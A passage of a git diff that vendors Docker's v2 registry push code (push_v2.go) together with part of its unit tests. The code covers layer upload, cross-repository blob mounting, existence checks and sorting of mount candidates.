"github.com/docker/distribution/registry/client" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" +) + +const ( + smallLayerMaximumSize = 100 * (1 << 10) // 100KB + middleLayerMaximumSize = 10 * (1 << 20) // 10MB +) + +// PushResult contains the tag, manifest digest, and manifest size from the +// 
push. It's used to signal this information to the trust code in the client +// so it can sign the manifest if necessary. +type PushResult struct { + Tag string + Digest digest.Digest + Size int +} + +type v2Pusher struct { + v2MetadataService metadata.V2MetadataService + ref reference.Named + endpoint registry.APIEndpoint + repoInfo *registry.RepositoryInfo + config *ImagePushConfig + repo distribution.Repository + + // pushState is state built by the Upload functions. + pushState pushState +} + +type pushState struct { + sync.Mutex + // remoteLayers is the set of layers known to exist on the remote side. + // This avoids redundant queries when pushing multiple tags that + // involve the same layers. It is also used to fill in digest and size + // information when building the manifest. + remoteLayers map[layer.DiffID]distribution.Descriptor + // confirmedV2 is set to true if we confirm we're talking to a v2 + // registry. This is used to limit fallbacks to the v1 protocol. + confirmedV2 bool +} + +func (p *v2Pusher) Push(ctx context.Context) (err error) { + p.pushState.remoteLayers = make(map[layer.DiffID]distribution.Descriptor) + + p.repo, p.pushState.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "push", "pull") + if err != nil { + logrus.Debugf("Error getting v2 registry: %v", err) + return err + } + + if err = p.pushV2Repository(ctx); err != nil { + if continueOnError(err) { + return fallbackError{ + err: err, + confirmedV2: p.pushState.confirmedV2, + transportOK: true, + } + } + } + return err +} + +func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) { + if namedTagged, isNamedTagged := p.ref.(reference.NamedTagged); isNamedTagged { + imageID, err := p.config.ReferenceStore.Get(p.ref) + if err != nil { + return fmt.Errorf("tag does not exist: %s", p.ref.String()) + } + + return p.pushV2Tag(ctx, namedTagged, imageID) + } + + if !reference.IsNameOnly(p.ref) { + return 
errors.New("cannot push a digest reference") + } + + // Pull all tags + pushed := 0 + for _, association := range p.config.ReferenceStore.ReferencesByName(p.ref) { + if namedTagged, isNamedTagged := association.Ref.(reference.NamedTagged); isNamedTagged { + pushed++ + if err := p.pushV2Tag(ctx, namedTagged, association.ID); err != nil { + return err + } + } + } + + if pushed == 0 { + return fmt.Errorf("no tags to push for %s", p.repoInfo.Name()) + } + + return nil +} + +func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id digest.Digest) error { + logrus.Debugf("Pushing repository: %s", ref.String()) + + imgConfig, err := p.config.ImageStore.Get(id) + if err != nil { + return fmt.Errorf("could not find image from tag %s: %v", ref.String(), err) + } + + rootfs, err := p.config.ImageStore.RootFSFromConfig(imgConfig) + if err != nil { + return fmt.Errorf("unable to get rootfs for image %s: %s", ref.String(), err) + } + + l, err := p.config.LayerStore.Get(rootfs.ChainID()) + if err != nil { + return fmt.Errorf("failed to get top layer from image: %v", err) + } + defer l.Release() + + hmacKey, err := metadata.ComputeV2MetadataHMACKey(p.config.AuthConfig) + if err != nil { + return fmt.Errorf("failed to compute hmac key of auth config: %v", err) + } + + var descriptors []xfer.UploadDescriptor + + descriptorTemplate := v2PushDescriptor{ + v2MetadataService: p.v2MetadataService, + hmacKey: hmacKey, + repoInfo: p.repoInfo, + ref: p.ref, + repo: p.repo, + pushState: &p.pushState, + } + + // Loop bounds condition is to avoid pushing the base layer on Windows. 
+ for i := 0; i < len(rootfs.DiffIDs); i++ { + descriptor := descriptorTemplate + descriptor.layer = l + descriptor.checkedDigests = make(map[digest.Digest]struct{}) + descriptors = append(descriptors, &descriptor) + + l = l.Parent() + } + + if err := p.config.UploadManager.Upload(ctx, descriptors, p.config.ProgressOutput); err != nil { + return err + } + + // Try schema2 first + builder := schema2.NewManifestBuilder(p.repo.Blobs(ctx), p.config.ConfigMediaType, imgConfig) + manifest, err := manifestFromBuilder(ctx, builder, descriptors) + if err != nil { + return err + } + + manSvc, err := p.repo.Manifests(ctx) + if err != nil { + return err + } + + putOptions := []distribution.ManifestServiceOption{distribution.WithTag(ref.Tag())} + if _, err = manSvc.Put(ctx, manifest, putOptions...); err != nil { + if runtime.GOOS == "windows" || p.config.TrustKey == nil || p.config.RequireSchema2 { + logrus.Warnf("failed to upload schema2 manifest: %v", err) + return err + } + + logrus.Warnf("failed to upload schema2 manifest: %v - falling back to schema1", err) + + manifestRef, err := distreference.WithTag(p.repo.Named(), ref.Tag()) + if err != nil { + return err + } + builder = schema1.NewConfigManifestBuilder(p.repo.Blobs(ctx), p.config.TrustKey, manifestRef, imgConfig) + manifest, err = manifestFromBuilder(ctx, builder, descriptors) + if err != nil { + return err + } + + if _, err = manSvc.Put(ctx, manifest, putOptions...); err != nil { + return err + } + } + + var canonicalManifest []byte + + switch v := manifest.(type) { + case *schema1.SignedManifest: + canonicalManifest = v.Canonical + case *schema2.DeserializedManifest: + _, canonicalManifest, err = v.Payload() + if err != nil { + return err + } + } + + manifestDigest := digest.FromBytes(canonicalManifest) + progress.Messagef(p.config.ProgressOutput, "", "%s: digest: %s size: %d", ref.Tag(), manifestDigest, len(canonicalManifest)) + + if err := addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id); err 
!= nil { + return err + } + + // Signal digest to the trust client so it can sign the + // push, if appropriate. + progress.Aux(p.config.ProgressOutput, PushResult{Tag: ref.Tag(), Digest: manifestDigest, Size: len(canonicalManifest)}) + + return nil +} + +func manifestFromBuilder(ctx context.Context, builder distribution.ManifestBuilder, descriptors []xfer.UploadDescriptor) (distribution.Manifest, error) { + // descriptors is in reverse order; iterate backwards to get references + // appended in the right order. + for i := len(descriptors) - 1; i >= 0; i-- { + if err := builder.AppendReference(descriptors[i].(*v2PushDescriptor)); err != nil { + return nil, err + } + } + + return builder.Build(ctx) +} + +type v2PushDescriptor struct { + layer PushLayer + v2MetadataService metadata.V2MetadataService + hmacKey []byte + repoInfo reference.Named + ref reference.Named + repo distribution.Repository + pushState *pushState + remoteDescriptor distribution.Descriptor + // a set of digests whose presence has been checked in a target repository + checkedDigests map[digest.Digest]struct{} +} + +func (pd *v2PushDescriptor) Key() string { + return "v2push:" + pd.ref.FullName() + " " + pd.layer.DiffID().String() +} + +func (pd *v2PushDescriptor) ID() string { + return stringid.TruncateID(pd.layer.DiffID().String()) +} + +func (pd *v2PushDescriptor) DiffID() layer.DiffID { + return pd.layer.DiffID() +} + +func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) { + if fs, ok := pd.layer.(distribution.Describable); ok { + if d := fs.Descriptor(); len(d.URLs) > 0 { + progress.Update(progressOutput, pd.ID(), "Skipped foreign layer") + return d, nil + } + } + + diffID := pd.DiffID() + + pd.pushState.Lock() + if descriptor, ok := pd.pushState.remoteLayers[diffID]; ok { + // it is already known that the push is not needed and + // therefore doing a stat is unnecessary + pd.pushState.Unlock() + progress.Update(progressOutput, 
pd.ID(), "Layer already exists") + return descriptor, nil + } + pd.pushState.Unlock() + + maxMountAttempts, maxExistenceChecks, checkOtherRepositories := getMaxMountAndExistenceCheckAttempts(pd.layer) + + // Do we have any metadata associated with this layer's DiffID? + v2Metadata, err := pd.v2MetadataService.GetMetadata(diffID) + if err == nil { + // check for blob existence in the target repository if we have a mapping with it + descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, false, 1, v2Metadata) + if exists || err != nil { + return descriptor, err + } + } + + // if digest was empty or not saved, or if blob does not exist on the remote repository, + // then push the blob. + bs := pd.repo.Blobs(ctx) + + var layerUpload distribution.BlobWriter + + // Attempt to find another repository in the same registry to mount the layer from to avoid an unnecessary upload + candidates := getRepositoryMountCandidates(pd.repoInfo, pd.hmacKey, maxMountAttempts, v2Metadata) + for _, mountCandidate := range candidates { + logrus.Debugf("attempting to mount layer %s (%s) from %s", diffID, mountCandidate.Digest, mountCandidate.SourceRepository) + createOpts := []distribution.BlobCreateOption{} + + if len(mountCandidate.SourceRepository) > 0 { + namedRef, err := reference.WithName(mountCandidate.SourceRepository) + if err != nil { + logrus.Errorf("failed to parse source repository reference %v: %v", namedRef.String(), err) + pd.v2MetadataService.Remove(mountCandidate) + continue + } + + // TODO (brianbland): We need to construct a reference where the Name is + // only the full remote name, so clean this up when distribution has a + // richer reference package + remoteRef, err := distreference.WithName(namedRef.RemoteName()) + if err != nil { + logrus.Errorf("failed to make remote reference out of %q: %v", namedRef.RemoteName(), namedRef.RemoteName()) + continue + } + + canonicalRef, err := distreference.WithDigest(distreference.TrimNamed(remoteRef), 
mountCandidate.Digest) + if err != nil { + logrus.Errorf("failed to make canonical reference: %v", err) + continue + } + + createOpts = append(createOpts, client.WithMountFrom(canonicalRef)) + } + + // send the layer + lu, err := bs.Create(ctx, createOpts...) + switch err := err.(type) { + case nil: + // noop + case distribution.ErrBlobMounted: + progress.Updatef(progressOutput, pd.ID(), "Mounted from %s", err.From.Name()) + + err.Descriptor.MediaType = schema2.MediaTypeLayer + + pd.pushState.Lock() + pd.pushState.confirmedV2 = true + pd.pushState.remoteLayers[diffID] = err.Descriptor + pd.pushState.Unlock() + + // Cache mapping from this layer's DiffID to the blobsum + if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ + Digest: err.Descriptor.Digest, + SourceRepository: pd.repoInfo.FullName(), + }); err != nil { + return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} + } + return err.Descriptor, nil + default: + logrus.Infof("failed to mount layer %s (%s) from %s: %v", diffID, mountCandidate.Digest, mountCandidate.SourceRepository, err) + } + + if len(mountCandidate.SourceRepository) > 0 && + (metadata.CheckV2MetadataHMAC(&mountCandidate, pd.hmacKey) || + len(mountCandidate.HMAC) == 0) { + cause := "blob mount failure" + if err != nil { + cause = fmt.Sprintf("an error: %v", err.Error()) + } + logrus.Debugf("removing association between layer %s and %s due to %s", mountCandidate.Digest, mountCandidate.SourceRepository, cause) + pd.v2MetadataService.Remove(mountCandidate) + } + + if lu != nil { + // cancel previous upload + cancelLayerUpload(ctx, mountCandidate.Digest, layerUpload) + layerUpload = lu + } + } + + if maxExistenceChecks-len(pd.checkedDigests) > 0 { + // do additional layer existence checks with other known digests if any + descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, checkOtherRepositories, maxExistenceChecks-len(pd.checkedDigests), v2Metadata) + if exists || err != nil { + return 
descriptor, err + } + } + + logrus.Debugf("Pushing layer: %s", diffID) + if layerUpload == nil { + layerUpload, err = bs.Create(ctx) + if err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + } + defer layerUpload.Close() + + // upload the blob + desc, err := pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload) + if err != nil { + return desc, err + } + + return desc, nil +} + +func (pd *v2PushDescriptor) SetRemoteDescriptor(descriptor distribution.Descriptor) { + pd.remoteDescriptor = descriptor +} + +func (pd *v2PushDescriptor) Descriptor() distribution.Descriptor { + return pd.remoteDescriptor +} + +func (pd *v2PushDescriptor) uploadUsingSession( + ctx context.Context, + progressOutput progress.Output, + diffID layer.DiffID, + layerUpload distribution.BlobWriter, +) (distribution.Descriptor, error) { + var reader io.ReadCloser + + contentReader, err := pd.layer.Open() + size, _ := pd.layer.Size() + + reader = progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, contentReader), progressOutput, size, pd.ID(), "Pushing") + + switch m := pd.layer.MediaType(); m { + case schema2.MediaTypeUncompressedLayer: + compressedReader, compressionDone := compress(reader) + defer func(closer io.Closer) { + closer.Close() + <-compressionDone + }(reader) + reader = compressedReader + case schema2.MediaTypeLayer: + default: + reader.Close() + return distribution.Descriptor{}, fmt.Errorf("unsupported layer media type %s", m) + } + + digester := digest.Canonical.New() + tee := io.TeeReader(reader, digester.Hash()) + + nn, err := layerUpload.ReadFrom(tee) + reader.Close() + if err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + + pushDigest := digester.Digest() + if _, err := layerUpload.Commit(ctx, distribution.Descriptor{Digest: pushDigest}); err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + + logrus.Debugf("uploaded layer %s (%s), %d bytes", diffID, pushDigest, nn) + progress.Update(progressOutput, 
pd.ID(), "Pushed") + + // Cache mapping from this layer's DiffID to the blobsum + if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ + Digest: pushDigest, + SourceRepository: pd.repoInfo.FullName(), + }); err != nil { + return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} + } + + desc := distribution.Descriptor{ + Digest: pushDigest, + MediaType: schema2.MediaTypeLayer, + Size: nn, + } + + pd.pushState.Lock() + // If Commit succeeded, that's an indication that the remote registry speaks the v2 protocol. + pd.pushState.confirmedV2 = true + pd.pushState.remoteLayers[diffID] = desc + pd.pushState.Unlock() + + return desc, nil +} + +// layerAlreadyExists checks if the registry already knows about any of the metadata passed in the "metadata" +// slice. If it finds one that the registry knows about, it returns the known digest and "true". If +// "checkOtherRepositories" is true, stat will be performed also with digests mapped to any other repository +// (not just the target one). 
+func (pd *v2PushDescriptor) layerAlreadyExists( + ctx context.Context, + progressOutput progress.Output, + diffID layer.DiffID, + checkOtherRepositories bool, + maxExistenceCheckAttempts int, + v2Metadata []metadata.V2Metadata, +) (desc distribution.Descriptor, exists bool, err error) { + // filter the metadata + candidates := []metadata.V2Metadata{} + for _, meta := range v2Metadata { + if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.FullName() { + continue + } + candidates = append(candidates, meta) + } + // sort the candidates by similarity + sortV2MetadataByLikenessAndAge(pd.repoInfo, pd.hmacKey, candidates) + + digestToMetadata := make(map[digest.Digest]*metadata.V2Metadata) + // an array of unique blob digests ordered from the best mount candidates to worst + layerDigests := []digest.Digest{} + for i := 0; i < len(candidates); i++ { + if len(layerDigests) >= maxExistenceCheckAttempts { + break + } + meta := &candidates[i] + if _, exists := digestToMetadata[meta.Digest]; exists { + // keep reference just to the first mapping (the best mount candidate) + continue + } + if _, exists := pd.checkedDigests[meta.Digest]; exists { + // existence of this digest has already been tested + continue + } + digestToMetadata[meta.Digest] = meta + layerDigests = append(layerDigests, meta.Digest) + } + +attempts: + for _, dgst := range layerDigests { + meta := digestToMetadata[dgst] + logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + desc, err = pd.repo.Blobs(ctx).Stat(ctx, dgst) + pd.checkedDigests[meta.Digest] = struct{}{} + switch err { + case nil: + if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.FullName() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) { + // cache mapping from this layer's DiffID to the blobsum + if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ + Digest: desc.Digest, + 
SourceRepository: pd.repoInfo.FullName(), + }); err != nil { + return distribution.Descriptor{}, false, xfer.DoNotRetry{Err: err} + } + } + desc.MediaType = schema2.MediaTypeLayer + exists = true + break attempts + case distribution.ErrBlobUnknown: + if meta.SourceRepository == pd.repoInfo.FullName() { + // remove the mapping to the target repository + pd.v2MetadataService.Remove(*meta) + } + default: + logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + } + } + + if exists { + progress.Update(progressOutput, pd.ID(), "Layer already exists") + pd.pushState.Lock() + pd.pushState.remoteLayers[diffID] = desc + pd.pushState.Unlock() + } + + return desc, exists, nil +} + +// getMaxMountAndExistenceCheckAttempts returns a maximum number of cross repository mount attempts from +// source repositories of target registry, maximum number of layer existence checks performed on the target +// repository and whether the check shall be done also with digests mapped to different repositories. The +// decision is based on layer size. The smaller the layer, the fewer attempts shall be made because the cost +// of upload does not outweigh a latency. 
+func getMaxMountAndExistenceCheckAttempts(layer PushLayer) (maxMountAttempts, maxExistenceCheckAttempts int, checkOtherRepositories bool) { + size, err := layer.Size() + switch { + // big blob + case size > middleLayerMaximumSize: + // 1st attempt to mount the blob few times + // 2nd few existence checks with digests associated to any repository + // then fallback to upload + return 4, 3, true + + // middle sized blobs; if we could not get the size, assume we deal with middle sized blob + case size > smallLayerMaximumSize, err != nil: + // 1st attempt to mount blobs of average size few times + // 2nd try at most 1 existence check if there's an existing mapping to the target repository + // then fallback to upload + return 3, 1, false + + // small blobs, do a minimum number of checks + default: + return 1, 1, false + } +} + +// getRepositoryMountCandidates returns an array of v2 metadata items belonging to the given registry. The +// array is sorted from youngest to oldest. If requireReigstryMatch is true, the resulting array will contain +// only metadata entries having registry part of SourceRepository matching the part of repoInfo. +func getRepositoryMountCandidates( + repoInfo reference.Named, + hmacKey []byte, + max int, + v2Metadata []metadata.V2Metadata, +) []metadata.V2Metadata { + candidates := []metadata.V2Metadata{} + for _, meta := range v2Metadata { + sourceRepo, err := reference.ParseNamed(meta.SourceRepository) + if err != nil || repoInfo.Hostname() != sourceRepo.Hostname() { + continue + } + // target repository is not a viable candidate + if meta.SourceRepository == repoInfo.FullName() { + continue + } + candidates = append(candidates, meta) + } + + sortV2MetadataByLikenessAndAge(repoInfo, hmacKey, candidates) + if max >= 0 && len(candidates) > max { + // select the youngest metadata + candidates = candidates[:max] + } + + return candidates +} + +// byLikeness is a sorting container for v2 metadata candidates for cross repository mount. 
The +// candidate "a" is preferred over "b": +// +// 1. if it was hashed using the same AuthConfig as the one used to authenticate to target repository and the +// "b" was not +// 2. if a number of its repository path components exactly matching path components of target repository is higher +type byLikeness struct { + arr []metadata.V2Metadata + hmacKey []byte + pathComponents []string +} + +func (bla byLikeness) Less(i, j int) bool { + aMacMatch := metadata.CheckV2MetadataHMAC(&bla.arr[i], bla.hmacKey) + bMacMatch := metadata.CheckV2MetadataHMAC(&bla.arr[j], bla.hmacKey) + if aMacMatch != bMacMatch { + return aMacMatch + } + aMatch := numOfMatchingPathComponents(bla.arr[i].SourceRepository, bla.pathComponents) + bMatch := numOfMatchingPathComponents(bla.arr[j].SourceRepository, bla.pathComponents) + return aMatch > bMatch +} +func (bla byLikeness) Swap(i, j int) { + bla.arr[i], bla.arr[j] = bla.arr[j], bla.arr[i] +} +func (bla byLikeness) Len() int { return len(bla.arr) } + +func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, marr []metadata.V2Metadata) { + // reverse the metadata array to shift the newest entries to the beginning + for i := 0; i < len(marr)/2; i++ { + marr[i], marr[len(marr)-i-1] = marr[len(marr)-i-1], marr[i] + } + // keep equal entries ordered from the youngest to the oldest + sort.Stable(byLikeness{ + arr: marr, + hmacKey: hmacKey, + pathComponents: getPathComponents(repoInfo.FullName()), + }) +} + +// numOfMatchingPathComponents returns a number of path components in "pth" that exactly match "matchComponents". 
+func numOfMatchingPathComponents(pth string, matchComponents []string) int { + pthComponents := getPathComponents(pth) + i := 0 + for ; i < len(pthComponents) && i < len(matchComponents); i++ { + if matchComponents[i] != pthComponents[i] { + return i + } + } + return i +} + +func getPathComponents(path string) []string { + // make sure to add docker.io/ prefix to the path + named, err := reference.ParseNamed(path) + if err == nil { + path = named.FullName() + } + return strings.Split(path, "/") +} + +func cancelLayerUpload(ctx context.Context, dgst digest.Digest, layerUpload distribution.BlobWriter) { + if layerUpload != nil { + logrus.Debugf("cancelling upload of blob %s", dgst) + err := layerUpload.Cancel(ctx) + if err != nil { + logrus.Warnf("failed to cancel upload: %v", err) + } + } +} diff --git a/vendor/github.com/docker/docker/distribution/push_v2_test.go b/vendor/github.com/docker/docker/distribution/push_v2_test.go new file mode 100644 index 0000000000..6a5216b1d0 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push_v2_test.go @@ -0,0 +1,579 @@ +package distribution + +import ( + "net/http" + "reflect" + "testing" + + "github.com/docker/distribution" + "github.com/docker/distribution/context" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema2" + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" +) + +func TestGetRepositoryMountCandidates(t *testing.T) { + for _, tc := range []struct { + name string + hmacKey string + targetRepo string + maxCandidates int + metadata []metadata.V2Metadata + candidates []metadata.V2Metadata + }{ + { + name: "empty metadata", + targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{}, + candidates: []metadata.V2Metadata{}, + }, + { + name: "one item not matching", + 
targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{taggedMetadata("key", "dgst", "127.0.0.1/repo")}, + candidates: []metadata.V2Metadata{}, + }, + { + name: "one item matching", + targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, + candidates: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, + }, + { + name: "allow missing SourceRepository", + targetRepo: "busybox", + maxCandidates: -1, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1")}, + {Digest: digest.Digest("3")}, + {Digest: digest.Digest("2")}, + }, + candidates: []metadata.V2Metadata{}, + }, + { + name: "handle docker.io", + targetRepo: "user/app", + maxCandidates: -1, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, + {Digest: digest.Digest("3"), SourceRepository: "user/bar"}, + {Digest: digest.Digest("2"), SourceRepository: "app"}, + }, + candidates: []metadata.V2Metadata{ + {Digest: digest.Digest("3"), SourceRepository: "user/bar"}, + {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, + {Digest: digest.Digest("2"), SourceRepository: "app"}, + }, + }, + { + name: "sort more items", + hmacKey: "abcd", + targetRepo: "127.0.0.1/foo/bar", + maxCandidates: -1, + metadata: []metadata.V2Metadata{ + taggedMetadata("hash", "1", "hello-world"), + taggedMetadata("efgh", "2", "127.0.0.1/hello-world"), + taggedMetadata("abcd", "3", "busybox"), + taggedMetadata("hash", "4", "busybox"), + taggedMetadata("hash", "5", "127.0.0.1/foo"), + taggedMetadata("hash", "6", "127.0.0.1/bar"), + taggedMetadata("efgh", "7", "127.0.0.1/foo/bar"), + taggedMetadata("abcd", "8", "127.0.0.1/xyz"), + taggedMetadata("hash", "9", "127.0.0.1/foo/app"), + }, + candidates: []metadata.V2Metadata{ + // first by matching hash + taggedMetadata("abcd", "8", "127.0.0.1/xyz"), + // then by longest matching prefix + taggedMetadata("hash", "9", 
"127.0.0.1/foo/app"), + taggedMetadata("hash", "5", "127.0.0.1/foo"), + // sort the rest of the matching items in reversed order + taggedMetadata("hash", "6", "127.0.0.1/bar"), + taggedMetadata("efgh", "2", "127.0.0.1/hello-world"), + }, + }, + { + name: "limit max candidates", + hmacKey: "abcd", + targetRepo: "user/app", + maxCandidates: 3, + metadata: []metadata.V2Metadata{ + taggedMetadata("abcd", "1", "user/app1"), + taggedMetadata("abcd", "2", "user/app/base"), + taggedMetadata("hash", "3", "user/app"), + taggedMetadata("abcd", "4", "127.0.0.1/user/app"), + taggedMetadata("hash", "5", "user/foo"), + taggedMetadata("hash", "6", "app/bar"), + }, + candidates: []metadata.V2Metadata{ + // first by matching hash + taggedMetadata("abcd", "2", "user/app/base"), + taggedMetadata("abcd", "1", "user/app1"), + // then by longest matching prefix + taggedMetadata("hash", "3", "user/app"), + }, + }, + } { + repoInfo, err := reference.ParseNamed(tc.targetRepo) + if err != nil { + t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) + } + candidates := getRepositoryMountCandidates(repoInfo, []byte(tc.hmacKey), tc.maxCandidates, tc.metadata) + if len(candidates) != len(tc.candidates) { + t.Errorf("[%s] got unexpected number of candidates: %d != %d", tc.name, len(candidates), len(tc.candidates)) + } + for i := 0; i < len(candidates) && i < len(tc.candidates); i++ { + if !reflect.DeepEqual(candidates[i], tc.candidates[i]) { + t.Errorf("[%s] candidate %d does not match expected: %#+v != %#+v", tc.name, i, candidates[i], tc.candidates[i]) + } + } + for i := len(candidates); i < len(tc.candidates); i++ { + t.Errorf("[%s] missing expected candidate at position %d (%#+v)", tc.name, i, tc.candidates[i]) + } + for i := len(tc.candidates); i < len(candidates); i++ { + t.Errorf("[%s] got unexpected candidate at position %d (%#+v)", tc.name, i, candidates[i]) + } + } +} + +func TestLayerAlreadyExists(t *testing.T) { + for _, tc := range []struct { + name string + metadata 
[]metadata.V2Metadata + targetRepo string + hmacKey string + maxExistenceChecks int + checkOtherRepositories bool + remoteBlobs map[digest.Digest]distribution.Descriptor + remoteErrors map[digest.Digest]error + expectedDescriptor distribution.Descriptor + expectedExists bool + expectedError error + expectedRequests []string + expectedAdditions []metadata.V2Metadata + expectedRemovals []metadata.V2Metadata + }{ + { + name: "empty metadata", + targetRepo: "busybox", + maxExistenceChecks: 3, + checkOtherRepositories: true, + }, + { + name: "single not existent metadata", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}}, + maxExistenceChecks: 3, + expectedRequests: []string{"pear"}, + expectedRemovals: []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}}, + }, + { + name: "access denied", + targetRepo: "busybox", + maxExistenceChecks: 1, + metadata: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + remoteErrors: map[digest.Digest]error{digest.Digest("apple"): distribution.ErrAccessDenied}, + expectedError: nil, + expectedRequests: []string{"apple"}, + }, + { + name: "not matching reposies", + targetRepo: "busybox", + maxExistenceChecks: 3, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"}, + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"}, + {Digest: digest.Digest("plum"), SourceRepository: "busybox"}, + {Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"}, + }, + }, + { + name: "check other repositories", + targetRepo: "busybox", + maxExistenceChecks: 10, + checkOtherRepositories: true, + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("apple"), SourceRepository: 
"docker.io/library/hello-world"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"}, + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"}, + {Digest: digest.Digest("plum"), SourceRepository: "busybox"}, + {Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"}, + }, + expectedRequests: []string{"plum", "pear", "apple", "orange", "banana"}, + }, + { + name: "find existing blob", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple"}, + }, + { + name: "find existing blob with different hmac", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{SourceRepository: "docker.io/library/busybox", Digest: digest.Digest("apple"), HMAC: "dummyhmac"}}, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple"}, + expectedAdditions: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + }, + { + name: "overwrite media types", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}}, + hmacKey: "key", + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple"), MediaType: "custom-media-type"}}, + expectedDescriptor: 
distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple"}, + expectedAdditions: []metadata.V2Metadata{taggedMetadata("key", "apple", "docker.io/library/busybox")}, + }, + { + name: "find existing blob among many", + targetRepo: "127.0.0.1/myapp", + hmacKey: "key", + metadata: []metadata.V2Metadata{ + taggedMetadata("someotherkey", "pear", "127.0.0.1/myapp"), + taggedMetadata("key", "apple", "127.0.0.1/myapp"), + taggedMetadata("", "plum", "127.0.0.1/myapp"), + }, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("pear"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple", "plum", "pear"}, + expectedAdditions: []metadata.V2Metadata{taggedMetadata("key", "pear", "127.0.0.1/myapp")}, + expectedRemovals: []metadata.V2Metadata{ + taggedMetadata("key", "apple", "127.0.0.1/myapp"), + {Digest: digest.Digest("plum"), SourceRepository: "127.0.0.1/myapp"}, + }, + }, + { + name: "reach maximum existence checks", + targetRepo: "user/app", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"}, + }, + maxExistenceChecks: 3, + remoteBlobs: 